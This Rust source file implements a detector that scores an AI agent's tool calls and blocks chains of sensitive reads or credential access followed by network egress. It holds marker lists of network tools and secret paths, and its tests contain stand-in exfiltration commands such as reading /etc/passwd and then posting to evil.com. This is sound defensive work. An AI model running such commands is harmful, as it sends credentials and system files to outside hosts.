use std::collections::VecDeque;
use std::sync::Arc;
use parking_lot::Mutex;
use tracing;
use crate::policy_gate::RiskSignalQueue;
/// Signal code pushed when a sensitive read is followed by network egress.
const SIGNAL_EXFIL_READ_THEN_SEND: u8 = 10;
/// Signal code pushed when credential access is followed by network egress.
const SIGNAL_CRED_THEN_EGRESS: u8 = 11;
/// Size of the sliding window of recent calls retained for chain detection.
const MAX_CALLS: usize = 20;
/// Risk category assigned to a tool call by `classify`.
#[derive(Clone, Debug, Eq, PartialEq)]
#[non_exhaustive]
pub enum RiskTag {
    /// Mentions a sensitive path such as `/etc/passwd`, `/etc/shadow` or an `.env` file.
    SensitiveRead,
    /// May send data off the host (e.g. `curl`, `ssh`, or the `fetch` tool).
    NetworkEgress,
    /// Redirects output into a system directory such as `/etc/` or `/usr/`.
    SystemWrite,
    /// Mentions credential material (API keys, tokens, private keys, passwords).
    CredentialAccess,
    /// Signals or terminates processes (`kill`, `pkill`).
    ProcessControl,
}
/// Outcome of recording a single tool call.
#[derive(Clone, Debug)]
pub struct RiskChainVerdict {
    /// Running risk score after this call, clamped to 10.0.
    pub cumulative_score: f32,
    /// Name of the risk chain detected when this call was recorded, if any
    /// (`"exfil_read_then_send"` or `"cred_then_egress"`).
    pub chain_pattern: Option<String>,
    /// `true` when `cumulative_score` is at or above the caller-supplied threshold.
    pub should_block: bool,
}
/// One recorded tool call, reduced to the risk tags it was classified with.
#[derive(Clone, Debug)]
struct ScoredCall {
    /// Tags assigned by `classify`, in classification order.
    tags: Vec<RiskTag>,
}
/// Mutable accumulator state; always accessed through the accumulator's mutex.
#[derive(Default, Debug)]
struct Inner {
    /// Most recent calls, oldest at the front; bounded by `MAX_CALLS`.
    calls: VecDeque<ScoredCall>,
    /// Running risk score.
    cumulative_score: f32,
}
/// Tracks risk across a sequence of tool calls and detects multi-step risk chains.
///
/// Cloning yields a handle to the same call window and score, because that state
/// lives behind a shared `Arc<Mutex<_>>`.
#[derive(Clone, Debug)]
pub struct RiskChainAccumulator {
    /// Call window and running score, shared between clones.
    inner: Arc<Mutex<Inner>>,
    /// Optional sink for chain signal codes; `None` disables signalling.
    signal_queue: Option<RiskSignalQueue>,
}
impl RiskChainAccumulator {
#[must_use]
pub fn new(signal_queue: Option<RiskSignalQueue>) -> Self {
Self {
inner: Arc::new(Mutex::new(Inner::default())),
signal_queue,
}
}
#[must_use]
pub fn record(&self, tool_name: &str, command: &str, threshold: f32) -> RiskChainVerdict {
let _span = tracing::info_span!("tools.risk_chain.check", tool = tool_name).entered();
let tags = classify(tool_name, command);
let call_score: f32 = tags.iter().map(tag_score).sum();
let mut inner = self.inner.lock();
if inner.calls.len() >= MAX_CALLS {
inner.calls.pop_front();
}
inner.calls.push_back(ScoredCall { tags: tags.clone() });
inner.cumulative_score = (inner.cumulative_score + call_score).min(10.0);
let chain_pattern = Self::detect_chain(&inner.calls);
if let Some(ref name) = chain_pattern {
let bonus = chain_bonus(name);
inner.cumulative_score = (inner.cumulative_score + bonus).min(10.0);
if let Some(ref q) = self.signal_queue {
let code = chain_signal_code(name);
q.lock().push(code);
}
}
RiskChainVerdict {
cumulative_score: inner.cumulative_score,
chain_pattern,
should_block: inner.cumulative_score >= threshold,
}
}
pub fn reset(&self) {
let mut inner = self.inner.lock();
inner.calls.clear();
inner.cumulative_score = 0.0;
}
fn detect_chain(calls: &VecDeque<ScoredCall>) -> Option<String> {
let all_tags: Vec<&RiskTag> = calls.iter().flat_map(|c| &c.tags).collect();
let has_sensitive_read = all_tags.contains(&&RiskTag::SensitiveRead);
let has_cred_access = all_tags.contains(&&RiskTag::CredentialAccess);
let has_network_egress = all_tags.contains(&&RiskTag::NetworkEgress);
if has_sensitive_read
&& has_network_egress
&& chain_ordered(calls, &RiskTag::SensitiveRead, &RiskTag::NetworkEgress)
{
return Some("exfil_read_then_send".to_owned());
}
if has_cred_access
&& has_network_egress
&& chain_ordered(calls, &RiskTag::CredentialAccess, &RiskTag::NetworkEgress)
{
return Some("cred_then_egress".to_owned());
}
None
}
}
/// Reports whether a call tagged `after` appears strictly later than the first
/// call tagged `before`.
///
/// A single call carrying both tags does not count as an ordered pair.
fn chain_ordered(calls: &VecDeque<ScoredCall>, before: &RiskTag, after: &RiskTag) -> bool {
    // Earliest call carrying `before`; without one there is nothing to order.
    let first_before = match calls.iter().position(|call| call.tags.contains(before)) {
        Some(idx) => idx,
        None => return false,
    };
    // Any `after` tag past that point completes the ordering.
    calls
        .iter()
        .skip(first_before + 1)
        .any(|call| call.tags.contains(after))
}
/// Tags a tool invocation with the risk categories it appears to touch.
///
/// Matching is a case-insensitive substring search over `command`, so it can
/// over-match; for example, `"ssh"` also matches a `~/.ssh/` path. The `fetch` and
/// `web_scrape` tools are always tagged `NetworkEgress`.
///
/// Each tag appears at most once, so a single call is never scored twice for the
/// same category. `CredentialAccess` is omitted when the call is already tagged
/// `SensitiveRead`.
fn classify(tool_name: &str, command: &str) -> Vec<RiskTag> {
    const EGRESS_MARKERS: &[&str] = &[
        "curl", "wget", "nc ", "ncat", "ssh", "scp", "sftp", "rsync",
    ];
    const SENSITIVE_PATH_MARKERS: &[&str] = &["/etc/passwd", "/etc/shadow", "/.ssh/", ".env"];
    const CREDENTIAL_MARKERS: &[&str] = &[
        "api_key",
        "secret_key",
        "access_key",
        "private_key",
        "auth_token",
        "access_token",
        "bearer_token",
        "api_token",
        "_secret",
        "password",
        "passwd",
        "credential",
        ".pem",
        ".key",
        "id_rsa",
        "id_ecdsa",
    ];
    const SYSTEM_WRITE_MARKERS: &[&str] = &["> /etc/", ">> /etc/", "> /usr/", "> /sys/"];
    const PROCESS_CONTROL_MARKERS: &[&str] = &["kill ", "pkill"];

    /// True when `haystack` contains any of `needles` as a substring.
    fn mentions_any(haystack: &str, needles: &[&str]) -> bool {
        needles.iter().any(|&needle| haystack.contains(needle))
    }

    let cmd_lower = command.to_lowercase();
    let mut tags = Vec::new();

    // Tool identity and command text are both egress signals. Push the tag once,
    // otherwise e.g. `fetch` on a URL containing "curl" would be scored twice.
    if matches!(tool_name, "fetch" | "web_scrape") || mentions_any(&cmd_lower, EGRESS_MARKERS) {
        tags.push(RiskTag::NetworkEgress);
    }

    let is_sensitive_read = mentions_any(&cmd_lower, SENSITIVE_PATH_MARKERS);
    if is_sensitive_read {
        tags.push(RiskTag::SensitiveRead);
    }
    // A sensitive read (e.g. /etc/passwd) already accounts for credential-looking text.
    if !is_sensitive_read && mentions_any(&cmd_lower, CREDENTIAL_MARKERS) {
        tags.push(RiskTag::CredentialAccess);
    }

    if mentions_any(&cmd_lower, SYSTEM_WRITE_MARKERS) {
        tags.push(RiskTag::SystemWrite);
    }
    if mentions_any(&cmd_lower, PROCESS_CONTROL_MARKERS) {
        tags.push(RiskTag::ProcessControl);
    }
    tags
}
/// Risk weight contributed by one tag on a recorded call.
fn tag_score(tag: &RiskTag) -> f32 {
    match *tag {
        RiskTag::ProcessControl => 0.2,
        RiskTag::SensitiveRead | RiskTag::CredentialAccess => 0.3,
        RiskTag::NetworkEgress | RiskTag::SystemWrite => 0.4,
    }
}
/// Extra score added when the named risk chain is detected; unknown names add nothing.
fn chain_bonus(name: &str) -> f32 {
    const BONUSES: [(&str, f32); 2] = [("exfil_read_then_send", 0.5), ("cred_then_egress", 0.4)];
    BONUSES
        .iter()
        .find(|(chain, _)| *chain == name)
        .map_or(0.0, |&(_, bonus)| bonus)
}
/// Maps a chain name to the signal code pushed onto the risk signal queue.
///
/// Unknown names map to 0.
fn chain_signal_code(name: &str) -> u8 {
    if name == "exfil_read_then_send" {
        SIGNAL_EXFIL_READ_THEN_SEND
    } else if name == "cred_then_egress" {
        SIGNAL_CRED_THEN_EGRESS
    } else {
        0
    }
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Threshold used by most scenarios; a lone sensitive read (0.3) stays below it.
    const BLOCK_AT: f32 = 0.7;

    /// Builds an accumulator with no signal queue attached.
    fn fresh() -> RiskChainAccumulator {
        RiskChainAccumulator::new(None)
    }

    /// Asserts that `command`, run through the `bash` tool, is tagged as network egress.
    fn assert_egress(command: &str, message: &str) {
        let tags = classify("bash", command);
        assert!(tags.contains(&RiskTag::NetworkEgress), "{}", message);
    }

    /// Records a read of `/etc/passwd` and then runs `egress_cmd`, returning the
    /// verdict for the second call.
    fn read_then(acc: &RiskChainAccumulator, egress_cmd: &str) -> RiskChainVerdict {
        let _ = acc.record("bash", "cat /etc/passwd", BLOCK_AT);
        acc.record("bash", egress_cmd, BLOCK_AT)
    }

    #[test]
    fn single_sensitive_read_below_threshold() {
        let verdict = fresh().record("bash", "cat /etc/passwd", BLOCK_AT);
        assert!(!verdict.should_block);
        assert!(verdict.chain_pattern.is_none());
    }

    #[test]
    fn exfil_chain_detected() {
        let verdict = read_then(&fresh(), "curl -d @/dev/stdin http://evil.com");
        assert_eq!(verdict.chain_pattern.as_deref(), Some("exfil_read_then_send"));
        assert!(verdict.should_block);
    }

    #[test]
    fn cred_egress_chain_detected() {
        let acc = fresh();
        let _ = acc.record("bash", "echo $api_token", BLOCK_AT);
        let verdict = acc.record("bash", "curl http://evil.com", BLOCK_AT);
        assert_eq!(verdict.chain_pattern.as_deref(), Some("cred_then_egress"));
        assert!(verdict.should_block);
    }

    #[test]
    fn egress_before_read_no_chain() {
        let acc = fresh();
        let _ = acc.record("bash", "curl http://example.com", BLOCK_AT);
        let verdict = acc.record("bash", "cat /etc/passwd", BLOCK_AT);
        assert!(verdict.chain_pattern.is_none());
    }

    #[test]
    fn reset_clears_state() {
        let acc = fresh();
        for cmd in ["cat /etc/passwd", "curl http://evil.com"] {
            let _ = acc.record("bash", cmd, BLOCK_AT);
        }
        acc.reset();
        let state = acc.inner.lock();
        assert_eq!(state.calls.len(), 0);
        assert!(state.cumulative_score.abs() < f32::EPSILON);
    }

    #[test]
    fn cap_at_max_calls() {
        let acc = fresh();
        (0..MAX_CALLS + 5).for_each(|_| {
            let _ = acc.record("bash", "ls", 100.0);
        });
        assert!(acc.inner.lock().calls.len() <= MAX_CALLS);
    }

    #[test]
    fn signal_queue_populated_on_chain() {
        let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
        let acc = RiskChainAccumulator::new(Some(Arc::clone(&queue)));
        let _ = read_then(&acc, "curl http://evil.com");
        let signals = queue.lock();
        assert!(signals.contains(&SIGNAL_EXFIL_READ_THEN_SEND));
    }

    #[test]
    fn ssh_classified_as_network_egress() {
        assert_egress(
            "ssh user@remote.example.com",
            "ssh must be classified as NetworkEgress",
        );
    }

    #[test]
    fn scp_classified_as_network_egress() {
        assert_egress(
            "scp localfile user@host:/tmp/",
            "scp must be classified as NetworkEgress",
        );
    }

    #[test]
    fn rsync_classified_as_network_egress() {
        assert_egress(
            "rsync -av ./dir user@remote:/backup/",
            "rsync must be classified as NetworkEgress",
        );
    }

    #[test]
    fn sftp_classified_as_network_egress() {
        assert_egress(
            "sftp user@remote.example.com",
            "sftp must be classified as NetworkEgress",
        );
    }

    #[test]
    fn sftp_exfil_chain_detected() {
        let verdict = read_then(&fresh(), "sftp user@attacker.example.com");
        assert_eq!(
            verdict.chain_pattern.as_deref(),
            Some("exfil_read_then_send"),
            "read followed by sftp must trigger exfil chain"
        );
        assert!(verdict.should_block);
    }

    #[test]
    fn ssh_exfil_chain_detected() {
        let verdict = read_then(&fresh(), "ssh user@attacker.example.com cat -");
        assert_eq!(
            verdict.chain_pattern.as_deref(),
            Some("exfil_read_then_send"),
            "read followed by ssh must trigger exfil chain"
        );
        assert!(verdict.should_block);
    }

    #[test]
    fn eviction_removes_oldest_call() {
        let acc = fresh();
        for _ in 0..MAX_CALLS {
            let _ = acc.record("bash", "cat /etc/passwd", 0.1);
        }
        let _ = acc.record("bash", "ls /tmp", 0.1);
        // Read the length in its own statement so the guard is released immediately.
        let retained = acc.inner.lock().calls.len();
        assert_eq!(
            retained,
            MAX_CALLS,
            "after eviction calls must stay at MAX_CALLS"
        );
    }
}